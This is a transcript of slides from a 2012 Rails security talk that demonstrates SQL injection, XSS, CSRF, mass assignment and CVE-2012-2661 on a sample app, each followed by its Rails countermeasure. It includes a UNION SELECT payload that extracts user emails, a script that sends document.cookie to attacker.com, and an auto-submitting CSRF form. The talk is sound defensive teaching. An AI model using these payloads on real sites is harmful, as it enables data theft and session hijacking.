Web Application Security in Rails

Transcript

1. WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012

2. Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael

3. Buy Now, Pay Later 1.  Shop online 2.  Receive your

   goods 3.  Pay

4. Alice

5. Bob

6. Alice and Bob

7. Alice and Bob

8. Alice and Bob Like Duh?

9. Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$

10. Alice and Bob Hack it!

11. SQL INJECTION

12. @results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’

    WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection

13. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection

    XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --

14. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT

    1, email, 1, 1, 1 FROM users -- %') SQL Injection

15. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT

    1, email, 1, 1, 1 FROM users -- %') SQL Injection

16. @results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection

    - countermeasures

17. CROSS SITE SCRIPTING XSS

18. <span class="content"> <%= raw feed_item.content %> </span> XSS

19. <script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>

    XSS

20. <span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>

    XSS - countermeasures

21. The Attack: Execute arbitrary code / defacement JSON is not

    escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS

22. CROSS SITE REQUEST FORGERY CSRF

23. www.blog.com CSRF 1

24. www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform”

    action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF

25. www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF

    3

26. www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST

    /blogpost Content=“Kick Me!” CSRF 4

27. <input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF –

    Authenticity Token

28. routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF

29. class ApplicationController < ActionController::Base # commented to easily test forms

    # protect_from_forgery ... end CSRF

30. The Attack: Attacker send requests on the victim’s behalf Doesn’t

    depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF

31. RAILS SPECIFIC ATTACKS

32. MASS ASSIGNMENT boo[gotcha!]

33. def create @user = User.new(params[:user]) ... end Mass Assignment

34. def create @user = User.new(params[:user]) ... end Mass Assignment {

    :name => “gotcha”, :admin => true }

35. Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass

    Assignment - countermeasures

36. Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation

    ... Mass Assignment - countermeasures

37. Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment -

    countermeasures

38. The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong

    Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment

39. SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)

40. User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.*

    FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection

41. /users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND

    users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection

42. The Attack: SQL Injection - Affected version: Rails < 3.2.4

    Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection

43. ------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross

    Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman

44. CONCLUSIONS

45. Make Love not War

46. Know the threats – OWASP top 10 Follow Rails conventions

    Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions

47. Daniel Amselem for pair programming Irit Shainzinger for the cool

    graphics Michael Hartl for his microblogging app tutorial Thanks to…

48. Pay Online – Safer and Simpler https://github.com/unativ/sample_app